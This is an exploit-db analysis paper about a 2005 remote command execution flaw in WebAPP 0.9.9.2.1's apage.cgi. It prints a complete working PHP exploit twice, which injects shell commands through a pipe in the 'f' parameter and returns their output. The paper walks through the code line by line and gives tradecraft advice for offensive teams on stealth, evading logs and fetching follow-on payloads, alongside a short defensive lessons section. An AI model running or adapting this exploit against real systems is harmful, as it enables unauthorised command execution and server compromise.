By exploitdb papers bot•May 20, 2005•
papers
WebAPP 0.9.9.2.1 Remote Command Execution Exploit Analysis
WebAPP 0.9.9.2.1 Remote Command Execution Exploit Analysis
What this paper is
This paper details a vulnerability in WebAPP version 0.9.9.2.1 that allows for Remote Command Execution (RCE). The exploit is presented as a PHP script that leverages a weakness in how the apage.cgi script handles user input to execute arbitrary commands on the target server.
Simple technical breakdown
The core of the exploit relies on a technique called "command injection" within a CGI script. CGI (Common Gateway Interface) scripts are used to generate dynamic content for web servers. In this case, the apage.cgi script in WebAPP 0.9.9.2.1 appears to be vulnerable to injecting additional commands through a GET request parameter.
The exploit script crafts a malicious HTTP GET request. It sends a request to the target web server, targeting the apage.cgi script. Within the URL, it uses a pipe character (|) to separate the legitimate request from the injected command. The injected command is then executed by the server's shell. The exploit script then captures and displays the output of the executed command.
Complete code and payload walkthrough
The provided exploit is a PHP script. Let's break down its components:
<?php
########################################################
# #
# WebAPP v0.9.9.2.1 Remote Command Execution Exploit #
# [Code by Nikyt0x] #
# nikyt0x@gmail.com #
# #
# Advisory: www.defacers.com.mx/advisories/3.txt # #
# #
# Saludos: #
# #
# Soulblack Staff, Status-x, NeosecurityTeam, #
# KingMetal, Trespasser... #
# #
########################################################
# #
# sbwebapp.php www.host.com /dirto/apage.cgi "command" #
# #
# Linux dprhensim19.doteasy.com 2.4.22-1.2199.nptl #
# #1 Wed Aug 4 12:21:48 EDT 2004 i686 i686 i386 #
# GNU/Linux #
# uid=557(scapip) gid=558(scapip) groups=558(scapip) #
# #
# #
# #
########################################################
if ($argc != 4) {
echo "\n =====================================\n";
echo " WebAPP v0.9.9.2.1 apage.cgi Exploit\n";
echo " =====================================\n";
echo " Nikyt0x - SoulBlack Team\n\n";
echo "\nUsage:\n\n";
echo " $argv[0] www.host.com /apagedir/apage.cgi \"command\"\n";
exit(0);
}
if(!ereg('apage.cgi',$argv[2])) {
echo "URL to apage.cgi Incorrect.";
exit(0);
}
echo "\n =====================================\n";
echo " WebAPP v0.9.9.2.1 apage.cgi Exploit\n";
echo " =====================================\n";
echo " Nikyt0x - SoulBlack Team\n\n";
$s0ck3t = fsockopen($argv[1], 80);
if (!$s0ck3t) {
echo "[-] Socket\n";
exit(0);
} else {
$ex3cutar = str_replace(" ", "%20", $argv[3]);
$petici0n = "GET $argv[2]?f=expofranquicias.htm|echo%20c0mand0s;$ex3cutar;echo%20final1zar| HTTP/1.1\r\n";
$petici0n .= "Host: $argv[1]\r\n";
$petici0n .= "Connection: Close\r\n\r\n";
echo "[+] Socket\n";
if(!fwrite($s0ck3t, $petici0n))
{
echo "[-] Sending Exploit\n";
exit(0);
}
echo "[+] Sending Exploit\n";
while (!feof($s0ck3t)) {
$g3tdata = fgets($s0ck3t, 1024);
if (eregi('c0mand0s',$g3tdata))
{
$aceptar = 1;
}
if (eregi('final1zar',$g3tdata))
{
$aceptar = 0;
}
while ($aceptar == 1)
{
if(eregi('c0mand0s',$g3tdata))
{
$g3tdata = str_replace('c0mand0s','', $g3tdata);
echo "[+] Command:\n";
}
$g3tdata = str_replace('c0mand0s','', $g3tdata);
echo $g3tdata;
break;
}
}
fclose($s0ck3t);
}
?>- Header Comments: The initial comments provide information about the exploit, including its author, contact details, advisory link, and a list of greetings. They also show an example of how to run the script and the system information of a target that was likely used during testing.
- Argument Check (
if ($argc != 4)):- Purpose: This block checks if the correct number of command-line arguments has been provided.
- Behavior:
$argcis a built-in PHP variable that holds the number of arguments passed to the script. If it's not exactly 4 (script name + host + path + command), it prints usage instructions and exits. - Mapping:
if ($argc != 4)-> Argument validation.
- Usage Message:
- Purpose: Informs the user how to correctly execute the script.
- Behavior: Prints a formatted message showing the expected command structure:
$argv[0](the script name),www.host.com(target host),/apagedir/apage.cgi(path to the vulnerable CGI script), and"command"(the command to execute). - Mapping:
echo ...-> Usage instructions.
- CGI Path Check (
if(!ereg('apage.cgi',$argv[2]))):- Purpose: Verifies that the provided path to the CGI script actually contains
apage.cgi. - Behavior:
ereg()is a regular expression matching function. Ifapage.cgiis not found in the second argument ($argv[2]), it prints an error message and exits. - Mapping:
if(!ereg('apage.cgi',$argv[2]))-> CGI script path validation.
- Purpose: Verifies that the provided path to the CGI script actually contains
- Socket Connection (
$s0ck3t = fsockopen($argv[1], 80);)- Purpose: Establishes a raw TCP socket connection to the target web server on port 80 (HTTP).
- Behavior:
fsockopen()attempts to connect to the host specified in$argv[1](the target hostname or IP address) on port 80. If the connection fails, it returnsfalse. - Mapping:
$s0ck3t = fsockopen($argv[1], 80);-> Establish HTTP connection.
- Connection Failure Check (
if (!$s0ck3t))- Purpose: Handles cases where the socket connection to the target server fails.
- Behavior: If
$s0ck3tisfalse(meaning the connection failed), it prints[-] Socketand exits. - Mapping:
if (!$s0ck3t)-> Handle connection errors.
- Exploit Request Construction (within
elseblock):$ex3cutar = str_replace(" ", "%20", $argv[3]);- Purpose: Prepares the user-supplied command for inclusion in a URL.
- Behavior: Replaces all spaces in the command (
$argv[3]) with%20, which is the URL-encoded representation of a space. This is crucial because spaces in URLs can be problematic. - Mapping:
$ex3cutar = str_replace(" ", "%20", $argv[3]);-> URL-encode command.
$petici0n = "GET $argv[2]?f=expofranquicias.htm|echo%20c0mand0s;$ex3cutar;echo%20final1zar| HTTP/1.1\r\n";- Purpose: Constructs the malicious HTTP GET request.
- Behavior:
GET $argv[2]: This is the HTTP GET method targeting the path to the CGI script ($argv[2]).?f=expofranquicias.htm: This is a parameter namedfwith a seemingly arbitrary value. The vulnerability likely lies in howapage.cgiprocesses this parameter.|echo%20c0mand0s;: This is the first part of the command injection. It pipes (|) the output of the preceding command (if any) toecho%20c0mand0s. Thisechocommand is used as a marker to identify the start of the actual command output.;$ex3cutar;: This is where the user-provided, URL-encoded command ($ex3cutar) is inserted. The semicolon;is used as a command separator in many shells.echo%20final1zar|: This is anotherechocommand used as a marker to identify the end of the command output.HTTP/1.1\r\n: Specifies the HTTP protocol version.
- Mapping:
$petici0n = "GET ...";-> Construct malicious HTTP request.
$petici0n .= "Host: $argv[1]\r\n";- Purpose: Adds the
Hostheader to the HTTP request. - Behavior: The
Hostheader is required for HTTP/1.1 and specifies the domain name of the server. - Mapping:
$petici0n .= "Host: $argv[1]\r\n";-> Add Host header.
- Purpose: Adds the
$petici0n .= "Connection: Close\r\n\r\n";- Purpose: Adds the
Connection: Closeheader and the final double carriage return/line feed to end the HTTP headers. - Behavior:
Connection: Closetells the server to close the connection after sending the response, simplifying the script's handling of the response. - Mapping:
$petici0n .= "Connection: Close\r\n\r\n";-> Add Connection header and end headers.
- Purpose: Adds the
- Sending the Exploit (
fwrite($s0ck3t, $petici0n))- Purpose: Sends the constructed HTTP request to the target server.
- Behavior:
fwrite()writes the$petici0nstring to the socket connection ($s0ck3t). If it fails, an error message is printed. - Mapping:
if(!fwrite($s0ck3t, $petici0n))-> Send HTTP request.
- Receiving and Parsing the Response (
while (!feof($s0ck3t)) { ... })- Purpose: Reads the server's response and extracts the output of the executed command.
- Behavior:
while (!feof($s0ck3t)): Loops as long as the end of the file (socket) has not been reached.$g3tdata = fgets($s0ck3t, 1024);: Reads one line (up to 1024 bytes) from the socket.if (eregi('c0mand0s',$g3tdata)) { $aceptar = 1; }: If the line contains the "start" markerc0mand0s, it sets a flag$aceptarto 1, indicating that subsequent lines should be treated as command output.eregiis a case-insensitive regular expression match.if (eregi('final1zar',$g3tdata)) { $aceptar = 0; }: If the line contains the "end" markerfinal1zar, it sets$aceptarto 0, stopping the capture of command output.while ($aceptar == 1) { ... }: This inner loop is intended to process lines while the capture flag is active.if(eregi('c0mand0s',$g3tdata)) { $g3tdata = str_replace('c0mand0s','', $g3tdata); echo "[+] Command:\n"; }: If the current line contains the start marker, it removes the marker and prints a[+] Command:header.$g3tdata = str_replace('c0mand0s','', $g3tdata);: This line, appearing twice, ensures the start marker is removed from the line being printed.echo $g3tdata;: Prints the current line of data from the server's response.break;: Exits the innerwhile ($aceptar == 1)loop after processing one line. This means each line of output is processed individually.
- Mapping:
while (!feof($s0ck3t))-> Read server response.fgets($s0ck3t, 1024)-> Read one line of response.eregi('c0mand0s', ...)-> Detect start of command output.eregi('final1zar', ...)-> Detect end of command output.echo $g3tdata;-> Print command output.
- Closing the Socket (
fclose($s0ck3t);)- Purpose: Closes the established TCP connection.
- Behavior: Releases the resources associated with the socket.
- Mapping:
fclose($s0ck3t);-> Close HTTP connection.
Payload/Shellcode Explanation:
There is no explicit shellcode in the traditional sense (e.g., raw machine code bytes). The "payload" here is the crafted HTTP request itself, which leverages the vulnerability to execute commands on the server. The commands are provided by the user as arguments to the PHP script.
The core of the "payload" is the string:GET $argv[2]?f=expofranquicias.htm|echo%20c0mand0s;$ex3cutar;echo%20final1zar| HTTP/1.1\r\nHost: $argv[1]\r\nConnection: Close\r\n\r\n
This string is dynamically built. The user-provided command ($argv[3]) is inserted into the middle, surrounded by markers (echo%20c0mand0s and echo%20final1zar) to help the exploit script parse the output. The pipe | character is the critical element that allows the injected command to be executed by the server's shell, likely because the apage.cgi script is not properly sanitizing or escaping this character when processing the f parameter.
Practical details for offensive operations teams
- Required Access Level: Network access to the target web server on port 80 (HTTP). No prior authentication or user privileges on the web application are typically required for this type of vulnerability.
- Lab Preconditions:
- A vulnerable WebAPP 0.9.9.2.1 installation. This can be set up in a virtual machine or a dedicated test environment.
- A web server (e.g., Apache, Nginx) configured to serve the vulnerable application.
- The target server must be accessible from the attacker's machine.
- Tooling Assumptions:
- PHP Interpreter: The exploit script is written in PHP, so a PHP interpreter is needed on the attacker's machine to run the exploit.
- Network Connectivity: Standard network tools (like
ping,traceroute) might be useful for initial reconnaissance. - Target Information: The attacker needs to know the target hostname/IP address and the correct path to the
apage.cgiscript within the web application's directory structure.
- Execution Pitfalls:
- Incorrect CGI Path: If the path to
apage.cgiis wrong, the exploit will fail. Theif(!ereg('apage.cgi',$argv[2]))check is basic; a more robust check might be needed if the path is complex or obfuscated. - Firewall/WAF Blocking: Network firewalls or Web Application Firewalls (WAFs) might detect and block the malicious HTTP request, especially if it contains suspicious patterns like
|or command injection attempts. - Server Configuration: The target server might have security measures in place that prevent CGI scripts from executing arbitrary commands, even if the injection is successful. This could include SELinux, AppArmor, or specific web server configurations.
- Output Parsing Errors: The exploit relies on specific markers (
c0mand0s,final1zar) to parse the output. If theapage.cgiscript's output format changes or includes these strings legitimately, the parsing logic might break, leading to incomplete or incorrect command output display. - Command Execution Environment: The commands will be executed within the context of the web server's user (e.g.,
www-data,apache,nobody). This user typically has limited privileges, restricting the scope of what commands can be executed effectively. - URL Encoding Issues: While spaces are handled, other special characters in the command might require different or additional encoding, or might break the command injection itself.
- Incorrect CGI Path: If the path to
- Tradecraft Considerations:
- Reconnaissance: Thoroughly identify the target application version and the specific CGI script path. Look for common installation paths or default configurations.
- Stealth: Running the exploit directly might generate noticeable logs on the web server. Consider using techniques to obfuscate the request or run it during periods of low activity.
- Payload Delivery: This exploit is for command execution, not for delivering a persistent backdoor. If persistence is desired, a secondary payload would need to be downloaded and executed.
- Output Handling: The script prints output directly. For more advanced operations, redirecting output to a file or piping it to another tool might be necessary.
- Error Handling: The exploit's error handling is basic. A more sophisticated approach would involve more detailed logging and error messages to aid in troubleshooting.
Where this was used and when
- Context: This exploit targets a vulnerability in WebAPP, a web application framework or suite. The advisory link points to
defacers.com.mx/advisories/3.txt, suggesting it was discovered and disclosed around the time of publication. - Approximate Year/Date: Published on May 20, 2005. This indicates the vulnerability existed and was exploited in or before 2005. The system information in the header comments also points to a Linux kernel version from 2004, further grounding the timeframe.
Defensive lessons for modern teams
- Input Validation and Sanitization: This is the most critical lesson. Web applications must rigorously validate and sanitize all user-supplied input, especially data that is passed to system commands or interpreted by the server's shell. Never trust input.
- Secure CGI Development: CGI scripts, if used, should be developed with extreme care. Avoid passing user input directly into shell commands. If command execution is unavoidable, use parameterized execution or secure APIs that prevent shell interpretation.
- Principle of Least Privilege: The web server process should run with the minimum necessary privileges. This limits the damage an attacker can do even if they achieve command execution.
- Web Application Firewalls (WAFs): Deploy and properly configure WAFs to detect and block common attack patterns like command injection. However, WAFs are not foolproof and can be bypassed.
- Regular Patching and Updates: Keep all web applications, frameworks, and server software up to date with the latest security patches. This vulnerability was specific to version 0.9.9.2.1, implying that upgrading would have mitigated the risk.
- Code Auditing: Regularly audit application code for common vulnerabilities like injection flaws, insecure deserialization, and cross-site scripting.
- Logging and Monitoring: Implement robust logging for web server access and application errors. Monitor these logs for suspicious activity, such as unusual GET requests or patterns indicative of command injection attempts.
ASCII visual (if applicable)
This exploit's flow can be visualized as a simple client-server interaction with injected data.
+-----------------+ HTTP Request +-----------------+
| Attacker's | ----------------------> | Target Web |
| Machine (PHP) | | Server |
+-----------------+ +-------+---------+
|
| CGI Execution
| (Vulnerable)
v
+-------+---------+
| apage.cgi |
| (Processes |
| parameter 'f') |
+-------+---------+
|
| Shell Command
| Execution
v
+-------+---------+
| Operating |
| System Shell |
+-----------------+
|
| Command Output
v
+-----------------+ HTTP Response +-------+---------+
| Attacker's | <---------------------- | Target Web |
| Machine (PHP) | | Server |
+-----------------+ +-----------------+Explanation:
- The attacker's machine sends an HTTP request crafted by the PHP script.
- The web server receives the request and passes it to the
apage.cgiscript. - The
apage.cgiscript, due to a vulnerability, interprets part of thefparameter as a shell command. - The operating system's shell executes the injected command.
- The output of the executed command is sent back to the attacker's machine within the HTTP response.
Source references
- Paper ID: 1004
- Paper Title: WebAPP 0.9.9.2.1 - Remote Command Execution (2)
- Author: Nikyt0x
- Published: 2005-05-20
- Keywords: CGI, webapps
- Paper URL: https://www.exploit-db.com/papers/1004
- Raw URL: https://www.exploit-db.com/raw/1004
Original Exploit-DB Content (Verbatim)
<?php
########################################################
# #
# WebAPP v0.9.9.2.1 Remote Command Execution Exploit #
# [Code by Nikyt0x] #
# nikyt0x@gmail.com #
# #
# Advisory: www.defacers.com.mx/advisories/3.txt # #
# #
# Saludos: #
# #
# Soulblack Staff, Status-x, NeosecurityTeam, #
# KingMetal, Trespasser... #
# #
########################################################
# #
# sbwebapp.php www.host.com /dirto/apage.cgi "command" #
# #
# Linux dprhensim19.doteasy.com 2.4.22-1.2199.nptl #
# #1 Wed Aug 4 12:21:48 EDT 2004 i686 i686 i386 #
# GNU/Linux #
# uid=557(scapip) gid=558(scapip) groups=558(scapip) #
# #
# #
# #
########################################################
if ($argc != 4) {
echo "\n =====================================\n";
echo " WebAPP v0.9.9.2.1 apage.cgi Exploit\n";
echo " =====================================\n";
echo " Nikyt0x - SoulBlack Team\n\n";
echo "\nUsage:\n\n";
echo " $argv[0] www.host.com /apagedir/apage.cgi \"command\"\n";
exit(0);
}
if(!ereg('apage.cgi',$argv[2])) {
echo "URL to apage.cgi Incorrect.";
exit(0);
}
echo "\n =====================================\n";
echo " WebAPP v0.9.9.2.1 apage.cgi Exploit\n";
echo " =====================================\n";
echo " Nikyt0x - SoulBlack Team\n\n";
$s0ck3t = fsockopen($argv[1], 80);
if (!$s0ck3t) {
echo "[-] Socket\n";
exit(0);
} else {
$ex3cutar = str_replace(" ", "%20", $argv[3]);
$petici0n = "GET $argv[2]?f=expofranquicias.htm|echo%20c0mand0s;$ex3cutar;echo%20final1zar| HTTP/1.1\r\n";
$petici0n .= "Host: $argv[1]\r\n";
$petici0n .= "Connection: Close\r\n\r\n";
echo "[+] Socket\n";
if(!fwrite($s0ck3t, $petici0n))
{
echo "[-] Sending Exploit\n";
exit(0);
}
echo "[+] Sending Exploit\n";
while (!feof($s0ck3t)) {
$g3tdata = fgets($s0ck3t, 1024);
if (eregi('c0mand0s',$g3tdata))
{
$aceptar = 1;
}
if (eregi('final1zar',$g3tdata))
{
$aceptar = 0;
}
while ($aceptar == 1)
{
if(eregi('c0mand0s',$g3tdata))
{
$g3tdata = str_replace('c0mand0s','', $g3tdata);
echo "[+] Command:\n";
}
$g3tdata = str_replace('c0mand0s','', $g3tdata);
echo $g3tdata;
break;
}
}
fclose($s0ck3t);
}
?>
# milw0rm.com [2005-05-20]